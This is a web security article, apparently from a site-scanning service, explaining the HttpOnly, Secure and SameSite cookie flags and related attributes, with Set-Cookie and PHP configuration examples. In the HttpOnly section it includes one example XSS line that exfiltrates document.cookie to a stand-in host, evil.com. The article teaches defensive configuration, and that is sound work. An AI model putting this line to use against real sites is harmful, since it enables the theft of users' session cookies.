Перейти к содержимому
Skip to content
API Pricing RU Sign In
← All articles
Security

Cookie Security Flags: HttpOnly, Secure, SameSite

Published: 14.03.2026 · 4 min read · 9 views

Why Cookie Security Is Critical

Cookies are the primary mechanism for session storage and authentication on the web. Misconfigured cookies open doors to attacks: session theft via XSS, request forgery via CSRF, and data interception over HTTP. Three key flags — HttpOnly, Secure, and SameSite — close most of these vulnerabilities.

The HttpOnly Flag

The HttpOnly flag prevents JavaScript from accessing the cookie. The browser sends the cookie with HTTP requests, but document.cookie cannot see it.

Without this flag, an attacker can inject a script through an XSS vulnerability and steal the session cookie:

// XSS attack without HttpOnly
new Image().src = "https://evil.com/steal?c=" + document.cookie;

With the HttpOnly flag, this attack is impossible — JavaScript simply has no access to the cookie.

When to use: always for session cookies and authentication tokens. Do not set it for cookies that JavaScript needs (e.g., theme or language preferences).

Set-Cookie: session_id=abc123; HttpOnly; Path=/

The Secure Flag

The Secure flag ensures the cookie is only transmitted over SSL/TLS проверку. Without this flag, the cookie can be intercepted during HTTP transmission — for example, on public Wi-Fi networks.

Man-in-the-middle attack without the Secure flag:

  1. User connects to public Wi-Fi
  2. Browser sends an HTTP request (before the HTTPS redirect)
  3. Cookie is transmitted in plaintext
  4. Attacker intercepts the session

When to use: always, if your site runs on HTTPS (and it should). All session and authentication cookies must have this flag.

Set-Cookie: session_id=abc123; Secure; HttpOnly; Path=/

The SameSite Attribute

The SameSite attribute controls whether the cookie is sent with cross-site requests. It is the primary defense against CSRF attacks.

SameSite=Strict

The cookie is never sent with cross-site requests. Maximum security, but it can hurt UX — if a user follows a link to your site from an email, they won't be logged in.

SameSite=Lax

The cookie is sent with top-level navigation (clicking a link) but not with POST requests, iframes, or AJAX from other sites. This is the default value in modern browsers — a good balance of security and usability.

SameSite=None

The cookie is sent with all cross-site requests. Requires the Secure flag. Use only when the cookie is genuinely needed on another domain (widgets, OAuth, iframe integrations).

// Recommended settings for session cookie
Set-Cookie: session_id=abc123; HttpOnly; Secure; SameSite=Lax; Path=/

// For cross-site widget
Set-Cookie: widget_token=xyz; Secure; SameSite=None; Path=/

Additional Cookie Attributes

Domain

Defines which domain can access the cookie. Without the Domain attribute, the cookie is bound to the exact domain only. With Domain=.example.com, it's accessible to all subdomains.

Recommendation: don't set Domain unless necessary. The narrower the scope, the more secure.

Path

Restricts the cookie to a specific path. Path=/admin means the cookie is only sent for requests to /admin and nested paths.

Max-Age and Expires

Max-Age sets the cookie's lifetime in seconds. Expires sets an absolute date. Without either, the cookie is a session cookie and is deleted when the browser closes.

Set-Cookie: remember_me=token; Max-Age=2592000; HttpOnly; Secure; SameSite=Lax

Cookie Prefixes: __Host- and __Secure-

Special name prefixes provide additional guarantees:

Set-Cookie: __Host-session=abc123; Secure; HttpOnly; SameSite=Lax; Path=/

Recommended Configuration

For a typical web application:

// PHP
session_set_cookie_params([
    'lifetime' => 0,       // Session cookie
    'path'     => '/',
    'domain'   => '',      // Current domain only
    'secure'   => true,    // HTTPS only
    'httponly'  => true,    // No JS access
    'samesite' => 'Lax'   // CSRF protection
]);

How to Check Cookie Settings

Use the Enterno.io Security Scanner to check your website's security headers, including cookie settings. In Chrome DevTools, you can view cookies under Application → Cookies, where all flags for each cookie are visible.

Summary

Three flags — HttpOnly, Secure, SameSite — are mandatory for all session cookies. They protect against XSS session theft, MITM interception, and CSRF attacks. Configure them once and close an entire class of vulnerabilities.

Check your website right now

Check now →
More articles: Security
Security
HSTS and Preload List: Complete Implementation Guide
16.03.2026 · 13 views
Security
Rate Limiting Strategies for Web APIs and Applications
16.03.2026 · 10 views
Security
Web Server Security Hardening Checklist: Nginx and Apache
16.03.2026 · 30 views
Security
Open Server Ports: How to Check and Why It Matters for Security
13.03.2026 · 10 views

Start monitoring for free

Sign up and get access to API, monitoring and notifications

Create Account API Documentation